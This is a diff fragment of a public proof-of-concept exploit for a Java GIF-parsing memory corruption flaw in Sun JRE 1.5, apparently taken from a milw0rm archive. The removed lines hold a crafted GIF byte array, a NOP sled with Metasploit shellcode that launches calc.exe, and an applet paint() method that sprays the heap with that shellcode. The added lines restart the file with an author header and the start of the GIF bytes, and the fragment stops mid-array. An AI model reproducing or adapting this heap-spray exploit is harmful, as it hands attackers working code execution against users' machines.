(byte)0x80, (byte)0x05, (byte)0xca, (byte)0x8d, - (byte)0x0c, (byte)0x0b, (byte)0x0b, (byte)0x40, (byte)0x2b, (byte)0x00, (byte)0x88, (byte)0xea, (byte)0x86, (byte)0xc6, (byte)0x4a, (byte)0xc1, (byte)0x0d, (byte)0x86, (byte)0xda, (byte)0x40, - (byte)0x01, (byte)0xf1, (byte)0x36, (byte)0x27, (byte)0x02, (byte)0x4e, (byte)0xd6, (byte)0x82, (byte)0x98, (byte)0x7d, (byte)0xc0, (byte)0x0d, (byte)0x33, (byte)0x80, (byte)0x80, (byte)0xf7, - (byte)0xd9, (byte)0xf5, (byte)0x0d, (byte)0x55, (byte)0xe8, (byte)0x40, (byte)0x1b, (byte)0x94, (byte)0xa0, (byte)0x84, (byte)0x24, (byte)0xd8, (byte)0x60, (byte)0x91, (byte)0x33, 
(byte)0xf3, - (byte)0x83, (byte)0x12, (byte)0x14, (byte)0x0b, (byte)0x85, (byte)0x23, (byte)0x84, (byte)0x88, (byte)0x0e, (byte)0xc7, (byte)0xb2, (byte)0x59, (byte)0x1c, (byte)0x64, (byte)0xf0, (byte)0x85, - (byte)0x0d, (byte)0x6c, (byte)0x40, (byte)0x0a, (byte)0x06, (byte)0xc8, (byte)0x15, (byte)0xb3, (byte)0x76, (byte)0xdb, (byte)0xb2, (byte)0x0a, (byte)0x36, (byte)0x80, (byte)0x03, (byte)0xf4, - (byte)0x4b, (byte)0x41, (byte)0x1c, (byte)0x94, (byte)0x00, (byte)0x82, (byte)0x22, (byte)0x18, (byte)0x97, (byte)0x04, (byte)0x02, (byte)0xc0, (byte)0x03, (byte)0x6a, (byte)0x47, (byte)0xf6, - (byte)0x83, (byte)0x3b, (byte)0x28, (byte)0x40, (byte)0x01, (byte)0x2c, (byte)0x58, (byte)0xc3, (byte)0x97, (byte)0x0a, (byte)0x50, (byte)0x80, (byte)0x39, (byte)0x60, (byte)0xe1, (byte)0xba, - (byte)0x58, (byte)0x38, (byte)0x81, (byte)0x0e, (byte)0x78, (byte)0xc0, (byte)0x87, (byte)0x0d, (byte)0x18, (byte)0x60, (byte)0x44, (byte)0x24, (byte)0x8a, (byte)0x50, (byte)0x1e, (byte)0xce, - (byte)0x60, (byte)0x26, (byte)0x33, (byte)0x79, (byte)0x8b, (byte)0x0f, (byte)0x66, (byte)0x20, (byte)0x6e, (byte)0x31, (byte)0x5b, (byte)0xb8, (byte)0x84, (byte)0x25, (byte)0xf8, (byte)0xf3, - (byte)0x6a, (byte)0x36, (byte)0x10, (byte)0x80, (byte)0x00, (byte)0x8a, (byte)0xd0, (byte)0x05, (byte)0xec, (byte)0xb6, (byte)0x70, (byte)0x10, (byte)0x73, (byte)0xd0, (byte)0xc1, (byte)0x11, - (byte)0x22, (byte)0x60, (byte)0x54, (byte)0x03, (byte)0x6c, (byte)0xc0, (byte)0x4c, (byte)0x06, (byte)0x08, (byte)0xb0, (byte)0x6d, (byte)0x6d, (byte)0x7b, (byte)0x83, (byte)0x63, (byte)0x11, - (byte)0xf7, (byte)0x04, (byte)0x58, (byte)0x68, (byte)0xef, (byte)0x46, (byte)0x90, (byte)0x49, (byte)0x31, (byte)0xb3, (byte)0x2a, (byte)0x58, (byte)0x11, (byte)0x25, (byte)0x28, (byte)0x82, - (byte)0xff, (byte)0x10, (byte)0x00, (byte)0x00, (byte)0x04, (byte)0xa2, (byte)0x52, (byte)0xa0, (byte)0xb1, (byte)0x01, (byte)0xce, (byte)0xb0, (byte)0x01, (byte)0xa4, (byte)0x40, (byte)0x96, - (byte)0x39, (byte)0xfc, (byte)0x40, 
(byte)0x4b, (byte)0xb2, (byte)0x58, (byte)0x6e, (byte)0x0a, (byte)0x0d, (byte)0xe1, (byte)0x1d, (byte)0x3c, (byte)0x24, (byte)0x36, (byte)0x26, (byte)0x28, - (byte)0x96, (byte)0x49, (byte)0x8d, (byte)0x56, (byte)0x0c, (byte)0x04, (byte)0x00, (byte)0x30, (byte)0x67, (byte)0xc4, (byte)0x95, (byte)0xc0, (byte)0x82, (byte)0x10, (byte)0x62, (byte)0xe2, - (byte)0x81, (byte)0x1a, (byte)0xdb, (byte)0x78, (byte)0xc5, (byte)0x35, (byte)0xf2, (byte)0x00, (byte)0x0b, (byte)0x68, (byte)0x07, (byte)0xe3, (byte)0x48, (byte)0x78, (byte)0xe7, (byte)0x04, - (byte)0x43, (byte)0x88, (byte)0x49, (byte)0x54, (byte)0x70, (byte)0xbc, (byte)0x62, (byte)0xa2, (byte)0x02, (byte)0x01, (byte)0x0e, (byte)0xd2, (byte)0xea, (byte)0xb1, (byte)0x23, (byte)0x04, - (byte)0x74, (byte)0x95, (byte)0x22, (byte)0x90, (byte)0x41, (byte)0xc5, (byte)0x72, (byte)0x91, (byte)0x4b, (byte)0x8d, (byte)0x73, (byte)0x0c, (byte)0x06, (byte)0x0f, (byte)0x30, (byte)0x01, - (byte)0x0f, (byte)0x48, (byte)0x50, (byte)0xf2, (byte)0x92, (byte)0x65, (byte)0xf1, (byte)0x83, (byte)0x22, (byte)0xb0, (byte)0x60, (byte)0xca, (byte)0x14, (byte)0x00, (byte)0x43, (byte)0x98, - (byte)0xab, (byte)0x3c, (byte)0x65, (byte)0x36, (byte)0x40, (byte)0x81, (byte)0x09, (byte)0x4b, (byte)0xc8, (byte)0xb2, (byte)0x96, (byte)0x19, (byte)0x31, (byte)0x8d, (byte)0x0f, (byte)0xfc, - (byte)0x00, (byte)0x04, (byte)0x32, (byte)0x81, (byte)0x42, (byte)0x8d, (byte)0xa2, (byte)0x1c, (byte)0x01, (byte)0xa8, (byte)0x78, (byte)0x00, (byte)0x0c, (byte)0x66, (byte)0xa6, (byte)0x42, - (byte)0x92, (byte)0xd6, (byte)0xfc, (byte)0x11, (byte)0x2e, (byte)0x53, (byte)0x21, (byte)0xce, (byte)0x35, (byte)0x6a, (byte)0xac, (byte)0x1b, (byte)0xea, (byte)0x5c, (byte)0xe5, (byte)0xc6, - (byte)0x52, (byte)0x40, (byte)0xcf, (byte)0x7c, (byte)0x7e, (byte)0x04, (byte)0x1e, (byte)0xfe, (byte)0x1c, (byte)0x15, (byte)0xb9, (byte)0xac, (byte)0x07, (byte)0x0c, (byte)0x8f, (byte)0x8e, - (byte)0x0a, (byte)0x1b, (byte)0xdc, (byte)0x30, (byte)0x01, (byte)0xf7, (byte)0x22, (byte)0x2f, 
(byte)0xd1, (byte)0x88, (byte)0xc0, (byte)0x83, (byte)0x12, (byte)0xe2, (byte)0xec, (byte)0xe8, - (byte)0x3a, (byte)0xaf, (byte)0xa7, (byte)0xb1, (byte)0x30, (byte)0x98, (byte)0xb4, (byte)0x12, (byte)0xce, (byte)0x86, (byte)0xe9, (byte)0x45, (byte)0xfc, (byte)0xe0, (byte)0xcf, (byte)0x2b, - (byte)0x86, (byte)0x74, (byte)0x04, (byte)0x06, (byte)0xfd, (byte)0x68, (byte)0x3c, (byte)0xb3, (byte)0x41, (byte)0x09, (byte)0x86, (byte)0x2d, (byte)0x75, (byte)0x21, (byte)0x4e, (byte)0x0d, - (byte)0x85, (byte)0x28, (byte)0xab, (byte)0x7a, (byte)0x3d, (byte)0x5f, (byte)0x68, (byte)0xac, (byte)0xab, (byte)0x17, (byte)0x10, (byte)0x6b, (byte)0x59, (byte)0x0f, (byte)0x82, (byte)0xd6, - (byte)0xb6, (byte)0xee, (byte)0x4f, (byte)0x04, (byte)0x66, (byte)0xe4, (byte)0x06, (byte)0x36, (byte)0x7c, (byte)0xa1, (byte)0x02, (byte)0x47, (byte)0xf1, (byte)0x75, (byte)0x22, (byte)0xde, - (byte)0xff, (byte)0x5c, (byte)0xeb, (byte)0x4e, (byte)0x0f, (byte)0x1b, (byte)0xd7, (byte)0x46, (byte)0x65, (byte)0x03, (byte)0xb8, (byte)0x4e, (byte)0x42, (byte)0x56, (byte)0x65, (byte)0x1f, - (byte)0x62, (byte)0x0f, (byte)0x7d, (byte)0x48, (byte)0x87, (byte)0xaa, (byte)0xc1, (byte)0x3b, (byte)0xec, (byte)0x2f, (byte)0x48, (byte)0xa1, (byte)0xdb, (byte)0x7a, (byte)0xae, (byte)0xb6, - (byte)0xb5, (byte)0x0b, (byte)0x61, (byte)0x81, (byte)0x6c, (byte)0x9b, (byte)0x66, (byte)0x34, (byte)0xe0, (byte)0x05, (byte)0xaf, (byte)0xa1, (byte)0x46, (byte)0xd4, (byte)0x2a, (byte)0x71, - (byte)0x8f, (byte)0x7b, (byte)0x10, (byte)0x36, (byte)0x50, (byte)0x82, (byte)0x08, (byte)0xfa, (byte)0x93, (byte)0x6e, (byte)0x3e, (byte)0x40, (byte)0xe8, (byte)0xb6, (byte)0xb9, (byte)0x15, - (byte)0xc2, (byte)0x09, (byte)0x54, (byte)0xa9, (byte)0x64, (byte)0x82, (byte)0xbc, (byte)0x62, (byte)0x02, (byte)0x22, (byte)0x18, (byte)0xcd, (byte)0x11, (byte)0xc0, (byte)0x8b, (byte)0xaa, - (byte)0x08, (byte)0x11, (byte)0xd8, (byte)0x0c, (byte)0x54, (byte)0xe0, (byte)0x77, (byte)0x8f, (byte)0xfd, (byte)0x3d, (byte)0x82, (byte)0x8b, (byte)0x59, 
(byte)0xe7, (byte)0xe1, (byte)0x66, - (byte)0xe0, (byte)0x43, (byte)0xae, (byte)0x36, (byte)0x70, (byte)0xaa, (byte)0x2c, (byte)0xbd, (byte)0xbb, (byte)0x10, (byte)0xb0, (byte)0x59, (byte)0x83, (byte)0x0c, (byte)0xb6, (byte)0x06, - (byte)0xa1, (byte)0x5c, (byte)0x25, (byte)0xac, (byte)0xbc, (byte)0x11, (byte)0xf0, (byte)0xd4, (byte)0xc5, (byte)0xc9, (byte)0x0d, (byte)0x97, (byte)0x6c, (byte)0xe5, (byte)0x8a, (byte)0x5d, - (byte)0x53, (byte)0xba, (byte)0x01, (byte)0x1b, (byte)0x98, (byte)0xd0, (byte)0x6b, (byte)0x5f, (byte)0x7f, (byte)0xa0, (byte)0x0b, (byte)0xb3, (byte)0xd5, (byte)0xd6, (byte)0xa9, (byte)0x08, - (byte)0xc0, (byte)0xae, (byte)0x3c, (byte)0x90, (byte)0x88, (byte)0xe5, (byte)0x23, (byte)0xc7, (byte)0x0a, (byte)0x33, (byte)0xa7, (byte)0xd0, (byte)0x86, (byte)0xd0, (byte)0x6c, (byte)0x0d, - (byte)0x61, (byte)0x11, (byte)0x7a, (byte)0xd6, (byte)0x88, (byte)0x2a, (byte)0xd0, (byte)0xf2, (byte)0x44, (byte)0xeb, (byte)0x1c, (byte)0x02, (byte)0x32, (byte)0xe0, (byte)0xc1, (byte)0x79, - (byte)0xa8, (byte)0xb3, (byte)0x35, (byte)0x6f, (byte)0x11, (byte)0x8a, (byte)0x00, (byte)0x47, (byte)0x70, (byte)0xcf, (byte)0xc8, (byte)0x09, (byte)0xf1, (byte)0xb6, (byte)0x1e, (byte)0xb4, - (byte)0xc1, (byte)0x0e, (byte)0x3e, (byte)0xa7, (byte)0x03, (byte)0x07, (byte)0xe8, (byte)0x30, (byte)0xb7, (byte)0x34, (byte)0x44, (byte)0xe8, (byte)0x08, (byte)0x16, (byte)0x9f, (byte)0xfa, - (byte)0x2f, (byte)0x96, (byte)0x50, (byte)0x00, (byte)0x19, (byte)0x98, (byte)0xac, (byte)0x56, (byte)0x0f, (byte)0x13, (byte)0xef, (byte)0x18, (byte)0xfc, (byte)0x0b, (byte)0xf6, (byte)0x3d, - (byte)0x5f, (byte)0xfc, (byte)0x07, (byte)0xc6, (byte)0x9a, (byte)0x02, (byte)0x90, (byte)0x82, (byte)0xb4, (byte)0x30, (byte)0x9b, (byte)0xf3, (byte)0x41, (byte)0x46, (byte)0xe0, (byte)0x42, - (byte)0xd1, (byte)0xd4, (byte)0x09, (byte)0x61, (byte)0x01, (byte)0x5a, (byte)0xd1, (byte)0x01, (byte)0x4e, (byte)0x17, (byte)0x58, (byte)0xd9, (byte)0x17, (byte)0xf8, (byte)0xd0, (byte)0x31, - (byte)0xff, 
(byte)0x21, (byte)0x24, (byte)0x7b, (byte)0xef, (byte)0x48, (byte)0x7c, (byte)0x13, (byte)0xd6, (byte)0x7d, (byte)0x80, (byte)0x03, (byte)0x0e, (byte)0xa4, (byte)0x81, (byte)0x0e, - (byte)0x66, (byte)0x42, (byte)0x41, (byte)0x1a, (byte)0xbe, (byte)0x20, (byte)0x04, (byte)0x44, (byte)0x22, (byte)0x5e, (byte)0x10, (byte)0x7b, (byte)0x50, (byte)0xc2, (byte)0x14, (byte)0x9c, - (byte)0x84, (byte)0x83, (byte)0x20, (byte)0x31, (byte)0xc8, (byte)0x4c, (byte)0x63, (byte)0xa0, (byte)0x03, (byte)0x18, (byte)0x16, (byte)0xc0, (byte)0x8e, (byte)0xcb, (byte)0x07, (byte)0xa0, - (byte)0x08, (byte)0x4a, (byte)0x60, (byte)0x3c, (byte)0xd6, (byte)0x3b, (byte)0x0f, (byte)0x22, (byte)0x67, (byte)0x41, (byte)0x8c, (byte)0xf4, (byte)0x6a, (byte)0x1e, (byte)0xf9, (byte)0x80, - (byte)0xe6, (byte)0x30, (byte)0x83, (byte)0x19, (byte)0xf4, (byte)0x1c, (byte)0x07, (byte)0x38, (byte)0xe0, (byte)0x50, (byte)0x83, (byte)0x34, (byte)0x35, (byte)0x37, (byte)0x21, (byte)0xe0, - (byte)0xe5, (byte)0xf2, (byte)0x0c, (byte)0x48, (byte)0x42, (byte)0xe7, (byte)0xa5, (byte)0x83, (byte)0xf5, (byte)0x20, (byte)0xed, (byte)0xea, (byte)0x08, (byte)0x37, (byte)0x18, (byte)0x83, - (byte)0x19, (byte)0x44, (byte)0x7e, (byte)0x79, (byte)0x3d, (byte)0xec, (byte)0x01, (byte)0x07, (byte)0xb5, (byte)0xbf, (byte)0x3d, (byte)0x07, (byte)0xb6, (byte)0xf6, (byte)0xf7, (byte)0x34, - (byte)0x18, (byte)0x60, (byte)0x0d, (byte)0xf3, (byte)0xda, (byte)0x3b, (byte)0x03, (byte)0x42, (byte)0xb0, (byte)0x82, (byte)0x0e, (byte)0xd8, (byte)0xa1, (byte)0x0d, (byte)0xb9, (byte)0x0f, - (byte)0xcd, (byte)0xc6, (byte)0x7c, (byte)0xb0, (byte)0x32, (byte)0x21, (byte)0xc0, (byte)0xcc, (byte)0xf4, (byte)0xc1, (byte)0xef, (byte)0x40, (byte)0x82, (byte)0x72, (byte)0x3f, (byte)0x85, - (byte)0xba, (byte)0x59, (byte)0x67, (byte)0x41, (byte)0x17, (byte)0x50, (byte)0xc2, (byte)0x8b, (byte)0x4d, (byte)0xff, (byte)0xfc, (byte)0x15, (byte)0xd8, (byte)0x1e, (byte)0x02, (byte)0x6d, - (byte)0x60, (byte)0xd0, (byte)0xfb, (byte)0x89, (byte)0xc3, (byte)0x04, 
(byte)0x2c, (byte)0x28, (byte)0x1c, (byte)0xd3, (byte)0x7b, (byte)0x30, (byte)0x03, (byte)0xf6, (byte)0x87, (byte)0x7f, - (byte)0xa1, (byte)0x41, (byte)0x1b, (byte)0x0f, (byte)0x27, (byte)0x04, (byte)0xd9, (byte)0x87, (byte)0x78, (byte)0xb4, (byte)0x67, (byte)0x7b, (byte)0x6d, (byte)0xd0, (byte)0x06, (byte)0x3d, - (byte)0x30, (byte)0x05, (byte)0x3f, (byte)0x57, (byte)0x1b, (byte)0x0b, (byte)0x60, (byte)0x36, (byte)0x1c, (byte)0xb5, (byte)0x77, (byte)0x27, (byte)0xc0, (byte)0x21, (byte)0x76, (byte)0xa0, - (byte)0x20, (byte)0xe8, (byte)0x91, (byte)0x2d, (byte)0x32, (byte)0xc0, (byte)0x05, (byte)0x36, (byte)0xa0, (byte)0x18, (byte)0xa6, (byte)0x87, (byte)0x7a, (byte)0x6d, (byte)0x30, (byte)0x03, - (byte)0x53, (byte)0xc0, (byte)0x03, (byte)0x53, (byte)0xf0, (byte)0x70, (byte)0x37, (byte)0x73, (byte)0x04, (byte)0x05, (byte)0xe0, (byte)0x2a, (byte)0xff, (byte)0xa7, (byte)0x65, (byte)0xed, - (byte)0xd0, (byte)0x05, (byte)0x4a, (byte)0xd0, (byte)0x73, (byte)0xc8, (byte)0x02, (byte)0x17, (byte)0xb6, (byte)0x21, (byte)0x03, (byte)0x42, (byte)0xd0, (byte)0x03, (byte)0x18, (byte)0x94, - (byte)0xff, (byte)0x17, (byte)0x97, (byte)0xf7, (byte)0x01, (byte)0x36, (byte)0x30, (byte)0x01, (byte)0x25, (byte)0x13, (byte)0x4b, (byte)0x35, (byte)0x78, (byte)0x1c, (byte)0x6d, (byte)0x50, - (byte)0x45, (byte)0xa6, (byte)0x37, (byte)0x08, (byte)0x51, (byte)0xc0, (byte)0x04, (byte)0x42, (byte)0x00, (byte)0x01, (byte)0xcd, (byte)0x14, (byte)0x84, (byte)0x1a, (byte)0x57, (byte)0x00, - (byte)0x96, (byte)0xd7, (byte)0x82, (byte)0x7c, (byte)0x56, (byte)0x02, (byte)0x24, (byte)0x20, (byte)0x04, (byte)0x53, (byte)0x30, (byte)0x5b, (byte)0xb7, (byte)0x11, (byte)0x18, (byte)0x3c, - (byte)0x90, (byte)0x04, (byte)0xb2, (byte)0xb0, (byte)0x45, (byte)0xda, (byte)0x07, (byte)0x1f, (byte)0x3e, (byte)0x12, (byte)0x07, (byte)0x1a, (byte)0x77, (byte)0x85, (byte)0x6b, (byte)0xa0, - (byte)0x03, (byte)0xa7, (byte)0xd5, (byte)0x0a, (byte)0x0c, (byte)0xa6, (byte)0x6c, (byte)0x73, (byte)0x24, (byte)0x61, (byte)0x7d, 
(byte)0x70, (byte)0x2c, (byte)0x7d, (byte)0x80, (byte)0x1c, - (byte)0x6b, (byte)0x60, (byte)0x01, (byte)0x03, (byte)0x02, (byte)0x1f, (byte)0x7b, (byte)0x87, (byte)0x16, (byte)0x20, (byte)0x30, (byte)0x04, (byte)0x37, (byte)0xd8, (byte)0x07, (byte)0x6d, - (byte)0xf8, (byte)0x12, (byte)0x3c, (byte)0x40, (byte)0x3a, (byte)0xd2, (byte)0x50, (byte)0x35, (byte)0xa6, (byte)0x57, (byte)0x0e, (byte)0x15, (byte)0x00, (byte)0x86, (byte)0x43, (byte)0xf0, - (byte)0x12, (byte)0x2f, (byte)0x41, (byte)0x86, (byte)0xf0, (byte)0x11, (byte)0x87, (byte)0xa6, (byte)0x57, (byte)0x02, (byte)0x3a, (byte)0x90, (byte)0x0e, (byte)0x6b, (byte)0xe0, (byte)0x14, - (byte)0x45, (byte)0xb1, (byte)0x07, (byte)0x96, (byte)0x17, (byte)0x00, (byte)0xcb, (byte)0x50, (byte)0x84, (byte)0x01, (byte)0xe0, (byte)0x13, (byte)0x21, (byte)0x25, (byte)0x02, (byte)0x64, - (byte)0x60, (byte)0x19, (byte)0x3a, (byte)0xd0, (byte)0x05, (byte)0xde, (byte)0xf1, (byte)0x53, (byte)0x97, (byte)0xb7, (byte)0x04, (byte)0x77, (byte)0x10, (byte)0x52, (byte)0x83, (byte)0x08, - (byte)0x05, (byte)0x42, (byte)0x00, (byte)0x89, (byte)0xbc, (byte)0xc1, (byte)0x1a, (byte)0x50, (byte)0x88, (byte)0x69, (byte)0x12, (byte)0xc6, (byte)0x02, (byte)0x6d, (byte)0x08, (byte)0x05, - (byte)0x4a, (byte)0xe0, (byte)0x0b, (byte)0x59, (byte)0xa1, (byte)0x13, (byte)0x94, (byte)0x18, (byte)0x00, (byte)0x36, (byte)0xe0, (byte)0x16, (byte)0x6b, (byte)0x40, (byte)0x06, (byte)0xe6, - (byte)0xf7, (byte)0x7b, (byte)0xb3, (byte)0x58, (byte)0x08, (byte)0xbc, (byte)0xa0, (byte)0x04, (byte)0x64, (byte)0xd0, (byte)0x07, (byte)0x4a, (byte)0xc0, (byte)0x63, (byte)0xbb, (byte)0x58, - (byte)0x08, (byte)0x0c, (byte)0x30, (byte)0x07, (byte)0x15, (byte)0xa0, (byte)0x0d, (byte)0x7b, (byte)0xb0, (byte)0x04, (byte)0xcc, (byte)0x80, (byte)0x88, (byte)0xc3, (byte)0x18, (byte)0x05, - (byte)0x24, (byte)0x70, (byte)0x07, (byte)0x2a, (byte)0x80, (byte)0x05, (byte)0xc3, (byte)0x88, (byte)0x08, (byte)0x8d, (byte)0x24, (byte)0x00, (byte)0x36, (byte)0x50, (byte)0x02, (byte)0xa9, 
- (byte)0x78, (byte)0x71, (byte)0xf7, (byte)0x35, (byte)0x8d, (byte)0xdc, (byte)0x68, (byte)0x39, (byte)0x18, (byte)0x57, (byte)0x74, (byte)0x88, (byte)0xc7, (byte)0x8c, (byte)0xcc, (byte)0xd8,
- (byte)0x09, (byte)0x8d, (byte)0x3f, (byte)0x74, (byte)0x86, (byte)0xe4, (byte)0x28, (byte)0x1f, (byte)0x81, (byte)0x00, (byte)0x00, (byte)0x3b
- };
- byte[] shellcode = new byte[]
- {
- (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90, (byte)0x90,
- // shellcode copied from metasploit to run calc.exe
- (byte)0x29, (byte)0xc9, (byte)0x83, (byte)0xe9, (byte)0xde, (byte)0xd9, (byte)0xee, (byte)0xd9, (byte)0x74, (byte)0x24, (byte)0xf4, (byte)0x5b, (byte)0x81, (byte)0x73, (byte)0x13, (byte)0x38,
- (byte)0x09, (byte)0x13, (byte)0x8e, (byte)0x83, (byte)0xeb, (byte)0xfc, (byte)0xe2, (byte)0xf4, (byte)0xc4, (byte)0xe1, (byte)0x57, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xcb,
- (byte)0x04, (byte)0x82, (byte)0x6f, (byte)0x8b, (byte)0x40, (byte)0x08, (byte)0xfc, (byte)0x05, (byte)0x77, (byte)0x11, (byte)0x98, (byte)0xd1, (byte)0x18, (byte)0x08, (byte)0xf8, (byte)0xc7,
- (byte)0xb3, (byte)0x3d, (byte)0x98, (byte)0x8f, (byte)0xd6, (byte)0x38, (byte)0xd3, (byte)0x17, (byte)0x94, (byte)0x8d, (byte)0xd3, (byte)0xfa, (byte)0x3f, (byte)0xc8, (byte)0xd9, (byte)0x83,
- (byte)0x39, (byte)0xcb, (byte)0xf8, (byte)0x7a, (byte)0x03, (byte)0x5d, (byte)0x37, (byte)0x8a, (byte)0x4d, (byte)0xec, (byte)0x98, (byte)0xd1, (byte)0x1c, (byte)0x08, (byte)0xf8, (byte)0xe8,
- (byte)0xb3, (byte)0x05, (byte)0x58, (byte)0x05, (byte)0x67, (byte)0x15, (byte)0x12, (byte)0x65, (byte)0xb3, (byte)0x15, (byte)0x98, (byte)0x8f, (byte)0xd3, (byte)0x80, (byte)0x4f, (byte)0xaa,
- (byte)0x3c, (byte)0xca, (byte)0x22, (byte)0x4e, (byte)0x5c, (byte)0x82, (byte)0x53, (byte)0xbe, (byte)0xbd, (byte)0xc9, (byte)0x6b, (byte)0x82, (byte)0xb3, (byte)0x49, (byte)0x1f, (byte)0x05,
- (byte)0x48,
(byte)0x15, (byte)0xbe, (byte)0x05, (byte)0x50, (byte)0x01, (byte)0xf8, (byte)0x87, (byte)0xb3, (byte)0x89, (byte)0xa3, (byte)0x8e, (byte)0x38, (byte)0x09, (byte)0x98, (byte)0xe6,
- (byte)0x04, (byte)0x56, (byte)0x22, (byte)0x78, (byte)0x58, (byte)0x5f, (byte)0x9a, (byte)0x76, (byte)0xbb, (byte)0xc9, (byte)0x68, (byte)0xde, (byte)0x50, (byte)0xf9, (byte)0x99, (byte)0x8a,
- (byte)0x67, (byte)0x61, (byte)0x8b, (byte)0x70, (byte)0xb2, (byte)0x07, (byte)0x44, (byte)0x71, (byte)0xdf, (byte)0x6a, (byte)0x72, (byte)0xe2, (byte)0x5b, (byte)0x09, (byte)0x13, (byte)0x8e
- };
-
- public void init() {
- image = Toolkit.getDefaultToolkit().createImage(imageBytes);
- }
-
- public void paint(Graphics g) {
- int heapBlockSize = 0x5000000;
- int heapSlidSize = 0x100000;
- byte[] buffer = new byte[heapBlockSize];
- byte heapFilling = (byte)0x24;
-
- for (int i = 0; i < buffer.length; i ++) {
- buffer[i] = heapFilling;
- }
-
- for (int i = 1; i < 0x50; i ++) {
- for (int j = 0; j < shellcode.length; j ++) {
- buffer[i * heapSlidSize - shellcode.length - 0x1000 + j] = shellcode[j];
- }
- }
-
- if (image != null) {
- g.drawImage(image, 0, 0, this);
- }
- }
-}
-
-// milw0rm.com [2007-01-21]
+/*
+*
+* FileName: JvmGifVulPoc.java
+*
+* Date: 2007-01-21
+*
+* Description: Sun Microsystems Java GIF File Parsing Memory Corruption Vulnerability Prove Of Concept Exploit
+*
+* Environment: Only successfully tested on Sun Jre 1.5
+*
+* Author: luoluo
+*
+* Contact: luoluonet_at_hotmail.com || luoluonet_at_126.com || luoluonet_at_yahoo.com
+*
+* Team: PST(Ph4nt0m Security Team, http://www.ph4nt0m.org) from P.R.C.
+*
+* Thanks YunShu very much, he helps to find a simple way to modify the width of image block.
+* Thanks all friends from ph4nt0m secutiry team, espacially Axis SuperHei Onlyu Nop EnvyMask CoCo OYXin Mix and etc.
+* Best wishes to the newly married couple TomyChen and his wife!
+*
+*
+*/
+
+import java.io.*;
+import java.applet.*;
+import javax.imageio.*;
+import java.util.*;
+import java.awt.*;
+
+public class JvmGifVulPoc extends Applet {
+ private Image image = null;
+ byte[] imageBytes = new byte[]
+ {
+ (byte)0x47, (byte)0x49, (byte)0x46, (byte)0x38, (byte)0x39, (byte)0x61, (byte)0x96, (byte)0x00, (byte)0x8c, (byte)0x00, (byte)0xe6, (byte)0x00, (byte)0x00, (byte)0x2d, (byte)0x20, (byte)0x21,
+ (byte)0x4a, (byte)0x6c, (byte)0xbd, (byte)0x49, (byte)0x5b, (byte)0x91, (byte)0x7b, (byte)0x88, (byte)0xc4, (byte)0x69, (byte)0x59, (byte)0x51, (byte)0x6d, (byte)0x71, (byte)0x8e, (byte)0x5b,
+ (byte)0x4b, (byte)0x39, (byte)0x7b, (byte)0x63, (byte)0x59, (byte)0xb8, (byte)0xaa, (byte)0x97, (byte)0xfe, (byte)0xf8, (byte)0xec, (byte)0x26, (byte)0x26, (byte)0x41, (byte)0x4b, (byte)0x47,
+ (byte)0x58, (byte)0x4a, (byte)0x6c, (byte)0xb3, (byte)0x91, (byte)0x7b, (byte)0x6f, (byte)0xf4, (byte)0xe7, (byte)0xda, (byte)0xa9, (byte)0x95, (byte)0x8c, (byte)0x60, (byte)0x5b, (byte)0x64,
+ (byte)0x52, (byte)0x3f, (byte)0x3a, (byte)0xea, (byte)0xd7, (byte)0xc6, (byte)0x45, (byte)0x4b, (byte)0x63, (byte)0x49, (byte)0x33, (byte)0x2e, (byte)0x3e, (byte)0x39, (byte)0x4e, (byte)0x5f,
+ (byte)0x6a, (byte)0x92, (byte)0x74, (byte)0x64, (byte)0x63, (byte)0xde, (byte)0xc8, (byte)0xbd, (byte)0xd4, (byte)0xb5, (byte)0xa3, (byte)0xa4, (byte)0x82, (byte)0x71, (byte)0x61, (byte)0x4b,
+ (byte)0x3b, (byte)0x7d, (byte)0x6c, (byte)0x6a, (byte)0x99, (byte)0x99, (byte)0x99, (byte)0x40, (byte)0x2c, (byte)0x28, (byte)0x52, (byte)0x6a, (byte)0xbe, (byte)0x52, (byte)0x5b, (byte)0x81,
+ (byte)0x76, (byte)0x7a, (byte)0x96, (byte)0x4a, (byte)0x3c, (byte)0x3a, (byte)0x52, (byte)0x6b, (byte)0xb5, (byte)0x33, (byte)0x33, (byte)0x66, (byte)0x50, (byte)0x6b, (byte)0xaf, (byte)0xbf,
+ (byte)0xc2, (byte)0xde, (byte)0x58, (byte)0x66, (byte)0x9b, (byte)0x72, (byte)0x5c, (byte)0x54, (byte)0x63, (byte)0x52, (byte)0x53, (byte)0x42, (byte)0x4f, (byte)0x7a, (byte)0xa6, (byte)0x9c,
+ (byte)0xa2,
(byte)0x33, (byte)0x28, (byte)0x33, (byte)0xff, (byte)0xff, (byte)0xff, (byte)0xa4, (byte)0x8d, (byte)0x84, (byte)0xe3, (byte)0xbf, (byte)0xa5, (byte)0x43, (byte)0x32, (byte)0x3a, + (byte)0x54, (byte)0x30, (byte)0x2d, (byte)0x53, (byte)0x4a, (byte)0x4b, (byte)0x8c, (byte)0x81, (byte)0x8c, (byte)0x85, (byte)0x73, (byte)0x6c, (byte)0x85, (byte)0x6a, (byte)0x61, (byte)0x58, + (byte)0x6c, (byte)0xa6, (byte)0x63, (byte)0x52, (byte)0x4a, (byte)0x87, (byte)0x7b, (byte)0x7f, (byte)0xf6, (byte)0xee, (byte)0xe7, (byte)0x5c, (byte)0x60, (byte)0x7e, (byte)0xb6, (byte)0xb6, + (byte)0xd1, (byte)0x5a, (byte)0x51, (byte)0x54, (byte)0x62, (byte)0x58, (byte)0x5a, (byte)0x72, (byte)0x66, (byte)0x6b, (byte)0x53, (byte)0x73, (byte)0xb6, (byte)0x37, (byte)0x2a, (byte)0x26, + (byte)0xc9, (byte)0xa5, (byte)0x8e, (byte)0x47, (byte)0x43, (byte)0x4d, (byte)0x3b, (byte)0x37, (byte)0x3b, (byte)0x89, (byte)0x8c, (byte)0xa6, (byte)0x51, (byte)0x60, (byte)0x8f, (byte)0xd4, + (byte)0xd6, (byte)0xdc, (byte)0x55, (byte)0x43, (byte)0x44, (byte)0x4b, (byte)0x6b, (byte)0xc4, (byte)0x67, (byte)0x72, (byte)0x9d, (byte)0x55, (byte)0x51, (byte)0x68, (byte)0x55, (byte)0x73, + (byte)0xbd, (byte)0x40, (byte)0x44, (byte)0x60, (byte)0x8c, (byte)0x71, (byte)0x6f, (byte)0xb7, (byte)0x9c, 